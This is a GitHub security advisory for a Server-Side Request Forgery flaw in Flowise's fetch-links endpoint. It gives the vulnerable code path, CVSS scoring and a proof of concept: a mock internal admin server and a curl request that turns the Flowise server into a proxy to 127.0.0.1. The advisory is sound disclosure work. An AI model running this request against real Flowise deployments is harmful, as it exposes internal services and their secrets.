Skip to content

SSRF in FlowiseAI/Flosise

High
HenryHengZJ published GHSA-hr92-4q35-4j3m Sep 13, 2025

Package

npm flowise (npm)

Affected versions

3.0.5

Patched versions

3.0.6

Description

Summary

A Server-Side Request Forgery (SSRF) vulnerability was discovered in the /api/v1/fetch-links endpoint of the Flowise application. This vulnerability allows an attacker to use the Flowise server as a proxy to access internal network web services and explore their link structures. The impact includes the potential exposure of sensitive internal administrative endpoints.

Details

Vulnerability Overview

The fetch-links feature in Flowise is designed to extract links from external websites or XML sitemaps. It performs an HTTP request from the server to the user-supplied URL and parses the response (HTML or XML) to extract and return links.

The issue arises because the feature performs these HTTP requests without validating the user-supplied URL. In particular, when the relativeLinksMethod parameter is set to webCrawl or xmlScrape, the server directly calls the fetch() function with the provided URL, making it vulnerable to SSRF attacks.

Root Cause

The fetch() function is called without URL validation or restriction, which enables attackers to redirect the server to internal services.

Taint Flow

• Taint 01: Route Registration

Flowise/packages/server/src/controllers/fetch-links/index.ts

Lines 6 to 24 in 5930f11

const getAllLinks = async (req: Request, res: Response, next: NextFunction) => {
try {
if (typeof req.query === 'undefined' || !req.query.url) {
throw new InternalFlowiseError(StatusCodes.PRECONDITION_FAILED, `Error: fetchLinksController.getAllLinks - url not provided!`)
}
if (typeof req.query === 'undefined' || !req.query.relativeLinksMethod) {
throw new InternalFlowiseError(
StatusCodes.PRECONDITION_FAILED,
`Error: fetchLinksController.getAllLinks - relativeLinksMethod not provided!`
)
}
if (typeof req.query === 'undefined' || !req.query.limit) {
throw new InternalFlowiseError(StatusCodes.PRECONDITION_FAILED, `Error: fetchLinksController.getAllLinks - limit not provided!`)
}
const apiResponse = await fetchLinksService.getAllLinks(
req.query.url as string,
req.query.relativeLinksMethod as string,
req.query.limit as string
)

• Taint 02: Service

Flowise/packages/server/src/services/fetch-links/index.ts

Lines 8 to 18 in 5930f11

const url = decodeURIComponent(requestUrl)
if (!relativeLinksMethod) {
throw new InternalFlowiseError(
StatusCodes.INTERNAL_SERVER_ERROR,
`Please choose a Relative Links Method in Additional Parameters!`
)
}
const limit = parseInt(queryLimit)
if (process.env.DEBUG === 'true') console.info(`Start ${relativeLinksMethod}`)
const links: string[] = relativeLinksMethod === 'webCrawl' ? await webCrawl(url, limit) : await xmlScrape(url, limit)
if (process.env.DEBUG === 'true') console.info(`Finish ${relativeLinksMethod}`)

• Taint 03: xmlScrape

Flowise/packages/components/src/utils.ts

Lines 474 to 478 in 5930f11

export async function xmlScrape(currentURL: string, limit: number): Promise<string[]> {
let urls: string[] = []
if (process.env.DEBUG === 'true') console.info(`actively scarping ${currentURL}`)
try {
const resp = await fetch(currentURL)

PoC

PoC Description

This vulnerability was verified in a local development environment. The Flowise server was running at http://localhost:3000, and authentication was performed using the Bearer token:

tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q

Upon a successful attack, the Flowise server returned the entire link structure of the internal admin panel in JSON format. The response included sensitive administrative URLs such as:

  • /api/users (User Management)
  • /api/secrets (API Keys)
  • /api/database (Database Config)

This demonstrated that an attacker could enumerate internal web service structures.

Internal Admin Server (Mock)

from flask import Flask, render_template_string

app = Flask(__name__)

@app.route('/')
def admin():
    return render_template_string("""
    <html>
    <h1>Internal Admin Panel</h1>
    <ul>
        <li><a href="/api/users">User Management</a></li>
        <li><a href="/api/secrets">API Keys</a></li>
        <li><a href="/api/database">Database Config</a></li>
        <li><a href="/api/logs">System Logs</a></li>
    </ul>
    """)

@app.route('/api/users')
def users():
    return render_template_string("""
    <html>
    <h1>Users</h1>
    <ul>
        <li><a href="/api/users/admin">admin (root)</a></li>
        <li><a href="/api/users/operator">operator</a></li>
    </ul>
    <a href="/">Back</a>
    """)

@app.route('/api/secrets')
def secrets():
    return render_template_string("""
    <html>
    <h1>Secrets</h1>
    <ul>
        <li><a href="/api/secrets/db_key">DB Key: sk-1234567890abcdef</a></li>
        <li><a href="/api/secrets/aws_key">AWS Key: AKIAIOSFODNN7EXAMPLE</a></li>
    </ul>
    <a href="/">Back</a>
    """)

if __name__ == '__main__':
    app.run(host='127.0.0.1', port=8080)

curl Request Example

curl -G 'http://localhost:3000/api/v1/fetch-links' \
     --data-urlencode 'url=http://127.0.0.1:8080/' \
     --data-urlencode 'relativeLinksMethod=webCrawl' \
     --data-urlencode 'limit=10' \
     -H 'Authorization: Bearer tmY1fIjgqZ6-nWUuZ9G7VzDtlsOiSZlDZjFSxZrDd0Q' \
     -s | jq '.'
image

Impact

This is a Server-Side Request Forgery (SSRF) vulnerability.

  • Who is impacted? Any user running Flowise server exposed to external traffic.
  • Risk: Attackers can leverage the Flowise server to:
    • Explore internal web applications
    • Bypass firewall rules
    • Access sensitive administrative interfaces
    • Leak internal configuration, credentials, or secrets

This vulnerability significantly increases the risk of internal service enumeration and potential lateral movement in an enterprise environment.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID

No known CVE

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.

Credits